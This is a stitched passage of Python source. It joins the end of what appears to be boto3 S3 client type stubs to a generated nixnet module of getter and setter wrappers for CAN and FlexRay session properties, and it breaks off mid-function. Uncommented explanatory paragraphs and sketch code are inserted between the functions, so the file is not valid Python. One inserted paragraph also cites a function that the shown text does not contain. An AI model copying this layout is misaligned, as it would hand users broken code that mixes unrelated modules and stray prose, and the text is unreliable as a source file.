def get_paginator(self, operation_name: str = None) -> Paginator:
pass
def get_public_access_block(self, Bucket: str) -> Dict:
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
pass
def head_bucket(self, Bucket: str):
pass
def head_object(self, Bucket: str, Key: str, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def list_bucket_analytics_configurations(self, Bucket: str, ContinuationToken: str = None) -> Dict:
pass
def list_bucket_inventory_configurations(self, Bucket: str, ContinuationToken: str = None) -> Dict:
pass
def list_bucket_metrics_configurations(self, Bucket: str, ContinuationToken: str = None) -> Dict:
pass
def list_buckets(self) -> Dict:
pass
def list_multipart_uploads(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, KeyMarker: str = None, MaxUploads: int = None, Prefix: str = None, UploadIdMarker: str = None) -> Dict:
pass
def list_object_versions(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, KeyMarker: str = None, MaxKeys: int = None, Prefix: str = None, VersionIdMarker: str = None) -> Dict:
pass
def list_objects(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, Marker: str = None, MaxKeys: int = None, Prefix: str = None, RequestPayer: str = None) -> Dict:
pass
def list_objects_v2(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, MaxKeys: int = None, Prefix: str = None, ContinuationToken: str = None, FetchOwner: bool = None, StartAfter: str = None, RequestPayer: str = None) -> Dict:
pass
def list_parts(self, Bucket: str, Key: str, UploadId: str, MaxParts: int = None, PartNumberMarker: int = None, RequestPayer: str = None) -> Dict:
pass
def put_bucket_accelerate_configuration(self, Bucket: str, AccelerateConfiguration: Dict):
pass
def put_bucket_acl(self, Bucket: str, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None):
pass
def put_bucket_analytics_configuration(self, Bucket: str, Id: str, AnalyticsConfiguration: Dict):
pass
def put_bucket_cors(self, Bucket: str, CORSConfiguration: Dict):
pass
def put_bucket_encryption(self, Bucket: str, ServerSideEncryptionConfiguration: Dict, ContentMD5: str = None):
pass
def put_bucket_inventory_configuration(self, Bucket: str, Id: str, InventoryConfiguration: Dict):
pass
def put_bucket_lifecycle(self, Bucket: str, LifecycleConfiguration: Dict = None):
pass
def put_bucket_lifecycle_configuration(self, Bucket: str, LifecycleConfiguration: Dict = None):
pass
def put_bucket_logging(self, Bucket: str, BucketLoggingStatus: Dict):
pass
def put_bucket_metrics_configuration(self, Bucket: str, Id: str, MetricsConfiguration: Dict):
pass
def put_bucket_notification(self, Bucket: str, NotificationConfiguration: Dict):
pass
def put_bucket_notification_configuration(self, Bucket: str, NotificationConfiguration: Dict):
pass
def put_bucket_policy(self, Bucket: str, Policy: str, ConfirmRemoveSelfBucketAccess: bool = None):
pass
def put_bucket_replication(self, Bucket: str, ReplicationConfiguration: Dict):
pass
def put_bucket_request_payment(self, Bucket: str, RequestPaymentConfiguration: Dict):
pass
def put_bucket_tagging(self, Bucket: str, Tagging: Dict):
pass
def put_bucket_versioning(self, Bucket: str, VersioningConfiguration: Dict, MFA: str = None):
pass
def put_bucket_website(self, Bucket: str, WebsiteConfiguration: Dict):
pass
def put_object(self, Bucket: str, Key: str, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def put_object_acl(self, Bucket: str, Key: str, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, RequestPayer: str = None, VersionId: str = None) -> Dict:
pass
def put_object_legal_hold(self, Bucket: str, Key: str, LegalHold: Dict = None, RequestPayer: str = None, VersionId: str = None, ContentMD5: str = None) -> Dict:
pass
def put_object_lock_configuration(self, Bucket: str, ObjectLockConfiguration: Dict = None, RequestPayer: str = None, Token: str = None, ContentMD5: str = None) -> Dict:
pass
def put_object_retention(self, Bucket: str, Key: str, Retention: Dict = None, RequestPayer: str = None, VersionId: str = None, BypassGovernanceRetention: bool = None, ContentMD5: str = None) -> Dict:
pass
def put_object_tagging(self, Bucket: str, Key: str, Tagging: Dict, VersionId: str = None, ContentMD5: str = None) -> Dict:
pass
def put_public_access_block(self, Bucket: str, PublicAccessBlockConfiguration: Dict, ContentMD5: str = None):
pass
def restore_object(self, Bucket: str, Key: str, VersionId: str = None, RestoreRequest: Dict = None, RequestPayer: str = None) -> Dict:
pass
def select_object_content(self, Bucket: str, Key: str, Expression: str, ExpressionType: str, InputSerialization: Dict, OutputSerialization: Dict, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestProgress: Dict = None) -> Dict:
pass
def upload_file(self, Filename: str = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_fileobj(self, Fileobj: IO = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_part(self, Bucket: str, Key: str, PartNumber: int, UploadId: str, Body: Union[bytes, IO] = None, ContentLength: int = None, ContentMD5: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
def upload_part_copy(self, Bucket: str, CopySource: Union[str, Dict], Key: str, PartNumber: int, UploadId: str, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, CopySourceRange: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
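`upload_part_copy` above types `CopySource` as `Union[str, Dict]`: boto3 accepts either a `"bucket/key"` string or a dict with `Bucket`, `Key`, and optionally `VersionId`. A hypothetical helper (not part of boto3, shown only to illustrate the dict form):

```python
from typing import Dict, Optional

def build_copy_source(bucket, key, version_id=None):
    # type: (str, str, Optional[str]) -> Dict
    """Build the dict form of CopySource (illustrative helper, not a boto3 API)."""
    source = {"Bucket": bucket, "Key": key}
    if version_id is not None:
        # Point the copy at a specific object version when versioning is enabled.
        source["VersionId"] = version_id
    return source
```

The dict form is required whenever the source key itself contains characters that would be ambiguous in the `"bucket/key"` string form, or when a specific version must be copied.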
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import typing # NOQA: F401
from nixnet import _cconsts
from nixnet import _cprops
def get_session_application_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_APPLICATION_PROTOCOL,
)
def get_session_auto_start(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_AUTO_START,
)
def set_session_auto_start(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_AUTO_START,
value,
)
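The rest of this module repeats the get/set pair shown above for every session property: a typed thin wrapper over `_cprops`, keyed by an `_cconsts` property ID. A minimal sketch of how such pairs are typically surfaced as Python properties on a session object (all names and the backing store here are invented for illustration; the real backing store is the NI-XNET C layer):

```python
import typing

# Fake backing store standing in for the _cprops C layer (illustration only).
_store = {}  # type: typing.Dict[typing.Tuple[int, int], object]

PROP_AUTO_START = 0x1234  # invented property ID, analogous to an _cconsts value

def get_session_bool(ref, prop_id):
    # type: (int, int) -> bool
    return bool(_store.get((ref, prop_id), False))

def set_session_bool(ref, prop_id, value):
    # type: (int, int, bool) -> None
    _store[(ref, prop_id)] = bool(value)

class Session(object):
    """Pairs the free get/set functions into one property, mirroring the pattern above."""

    def __init__(self, ref):
        # type: (int) -> None
        self._ref = ref

    @property
    def auto_start(self):
        # type: () -> bool
        return get_session_bool(self._ref, PROP_AUTO_START)

    @auto_start.setter
    def auto_start(self, value):
        # type: (bool) -> None
        set_session_bool(self._ref, PROP_AUTO_START, value)
```

Keeping the flat get/set functions separate from the property layer keeps this module mechanical and easy to generate, while user-facing classes can expose the friendlier attribute syntax.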
def get_session_cluster_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_CLUSTER_NAME,
)
def get_session_database_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_DATABASE_NAME,
)
def get_session_list(
ref, # type: int
):
# type: (...) -> typing.Iterable[typing.Text]
return _cprops.get_session_string_array(
ref,
_cconsts.NX_PROP_SESSION_LIST,
)
def get_session_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_MODE,
)
def get_session_num_frames(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_FRAMES,
)
def get_session_num_in_list(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_IN_LIST,
)
def get_session_num_pend(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_PEND,
)
def get_session_num_unused(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_UNUSED,
)
def get_session_payld_len_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_PAYLD_LEN_MAX,
)
def get_session_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_PROTOCOL,
)
def get_session_queue_size(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_QUEUE_SIZE,
)
def set_session_queue_size(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_QUEUE_SIZE,
value,
)
def get_session_resamp_rate(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_RESAMP_RATE,
)
def set_session_resamp_rate(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_RESAMP_RATE,
value,
)
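Each wrapper's `_cconsts` key follows directly from the function name: strip the `get_`/`set_` prefix, upper-case the rest, and prepend `NX_PROP_`. A hypothetical helper capturing that convention (illustration only; this file is clearly generated, and a handful of names deviate, e.g. `lin_diag_p2min` maps to `NX_PROP_SESSION_INTF_LIN_DIAG_P_2MIN`):

```python
def prop_constant_name(func_name):
    # type: (str) -> str
    """Derive the _cconsts name from a getter/setter name (naming convention
    sketch only; a few generated names in the real module deviate from it)."""
    assert func_name.startswith(("get_", "set_"))
    return "NX_PROP_" + func_name[4:].upper()
```

For example, `get_session_intf_can_term` yields `NX_PROP_SESSION_INTF_CAN_TERM`, matching the pair defined later in this module.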
def get_session_intf_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE,
)
def set_session_intf_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE,
value,
)
def get_session_intf_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE64,
)
def set_session_intf_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE64,
value,
)
def get_session_intf_bus_err_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_BUS_ERR_TO_IN_STRM,
)
def set_session_intf_bus_err_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_BUS_ERR_TO_IN_STRM,
value,
)
def get_session_intf_echo_tx(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_ECHO_TX,
)
def set_session_intf_echo_tx(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_ECHO_TX,
value,
)
def get_session_intf_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_INTF_NAME,
)
def get_session_intf_out_strm_list(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_LIST,
)
def set_session_intf_out_strm_list(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_session_ref_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_LIST,
value,
)
def get_session_intf_out_strm_timng(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_TIMNG,
)
def set_session_intf_out_strm_timng(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_TIMNG,
value,
)
def get_session_intf_start_trig_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_START_TRIG_TO_IN_STRM,
)
def set_session_intf_start_trig_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_START_TRIG_TO_IN_STRM,
value,
)
def set_session_intf_can_ext_tcvr_config(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_EXT_TCVR_CONFIG,
value,
)
def get_session_intf_can_lstn_only(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_LSTN_ONLY,
)
def set_session_intf_can_lstn_only(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_LSTN_ONLY,
value,
)
def get_session_intf_can_pend_tx_order(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_PEND_TX_ORDER,
)
def set_session_intf_can_pend_tx_order(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_PEND_TX_ORDER,
value,
)
def get_session_intf_can_sing_shot(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_SING_SHOT,
)
def set_session_intf_can_sing_shot(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_SING_SHOT,
value,
)
def get_session_intf_can_term(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TERM,
)
def set_session_intf_can_term(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TERM,
value,
)
def get_session_intf_can_tcvr_state(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_STATE,
)
def set_session_intf_can_tcvr_state(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_STATE,
value,
)
def get_session_intf_can_tcvr_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_TYPE,
)
def set_session_intf_can_tcvr_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_TYPE,
value,
)
def get_session_intf_can_out_strm_list_by_id(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_OUT_STRM_LIST_BY_ID,
)
def set_session_intf_can_out_strm_list_by_id(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_OUT_STRM_LIST_BY_ID,
value,
)
def get_session_intf_can_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_IO_MODE,
)
def get_session_intf_can_fd_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE,
)
def set_session_intf_can_fd_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE,
value,
)
def get_session_intf_can_fd_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE64,
)
def set_session_intf_can_fd_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE64,
value,
)
def get_session_intf_can_tx_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TX_IO_MODE,
)
def set_session_intf_can_tx_io_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TX_IO_MODE,
value,
)
def get_session_intf_can_fd_iso_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_ISO_MODE,
)
def set_session_intf_can_fd_iso_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_ISO_MODE,
value,
)
def get_session_intf_flex_ray_acc_start_rng(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ACC_START_RNG,
)
def set_session_intf_flex_ray_acc_start_rng(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ACC_START_RNG,
value,
)
def get_session_intf_flex_ray_alw_hlt_clk(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_HLT_CLK,
)
def set_session_intf_flex_ray_alw_hlt_clk(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_HLT_CLK,
value,
)
def get_session_intf_flex_ray_alw_pass_act(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_PASS_ACT,
)
def set_session_intf_flex_ray_alw_pass_act(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_PASS_ACT,
value,
)
def get_session_intf_flex_ray_auto_aslp_whn_stp(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_AUTO_ASLP_WHN_STP,
)
def set_session_intf_flex_ray_auto_aslp_whn_stp(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_AUTO_ASLP_WHN_STP,
value,
)
def get_session_intf_flex_ray_clst_drift_dmp(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CLST_DRIFT_DMP,
)
def set_session_intf_flex_ray_clst_drift_dmp(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CLST_DRIFT_DMP,
value,
)
def get_session_intf_flex_ray_coldstart(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_COLDSTART,
)
def get_session_intf_flex_ray_dec_corr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DEC_CORR,
)
def set_session_intf_flex_ray_dec_corr(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DEC_CORR,
value,
)
def get_session_intf_flex_ray_delay_comp_a(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_A,
)
def set_session_intf_flex_ray_delay_comp_a(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_A,
value,
)
def get_session_intf_flex_ray_delay_comp_b(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_B,
)
def set_session_intf_flex_ray_delay_comp_b(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_B,
value,
)
def get_session_intf_flex_ray_key_slot_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_KEY_SLOT_ID,
)
def set_session_intf_flex_ray_key_slot_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_KEY_SLOT_ID,
value,
)
def get_session_intf_flex_ray_latest_tx(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_LATEST_TX,
)
def get_session_intf_flex_ray_list_timo(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_LIST_TIMO,
)
def set_session_intf_flex_ray_list_timo(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_LIST_TIMO,
value,
)
def get_session_intf_flex_ray_mac_init_off_a(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_A,
)
def set_session_intf_flex_ray_mac_init_off_a(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_A,
value,
)
def get_session_intf_flex_ray_mac_init_off_b(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_B,
)
def set_session_intf_flex_ray_mac_init_off_b(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_B,
value,
)
def get_session_intf_flex_ray_mic_init_off_a(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_A,
)
def set_session_intf_flex_ray_mic_init_off_a(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_A,
value,
)
def get_session_intf_flex_ray_mic_init_off_b(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_B,
)
def set_session_intf_flex_ray_mic_init_off_b(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_B,
value,
)
def get_session_intf_flex_ray_max_drift(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAX_DRIFT,
)
def set_session_intf_flex_ray_max_drift(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAX_DRIFT,
value,
)
def get_session_intf_flex_ray_microtick(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MICROTICK,
)
def get_session_intf_flex_ray_null_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_NULL_TO_IN_STRM,
)
def set_session_intf_flex_ray_null_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_NULL_TO_IN_STRM,
value,
)
def get_session_intf_flex_ray_off_corr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_OFF_CORR,
)
def get_session_intf_flex_ray_off_corr_out(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_OFF_CORR_OUT,
)
def set_session_intf_flex_ray_off_corr_out(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_OFF_CORR_OUT,
value,
)
def get_session_intf_flex_ray_rate_corr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_RATE_CORR,
)
def get_session_intf_flex_ray_rate_corr_out(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_RATE_CORR_OUT,
)
def set_session_intf_flex_ray_rate_corr_out(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_RATE_CORR_OUT,
value,
)
def get_session_intf_flex_ray_samp_per_micro(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SAMP_PER_MICRO,
)
def set_session_intf_flex_ray_samp_per_micro(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SAMP_PER_MICRO,
value,
)
def get_session_intf_flex_ray_sing_slot_en(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SING_SLOT_EN,
)
def set_session_intf_flex_ray_sing_slot_en(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_SING_SLOT_EN,
value,
)
def get_session_intf_flex_ray_statistics_en(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
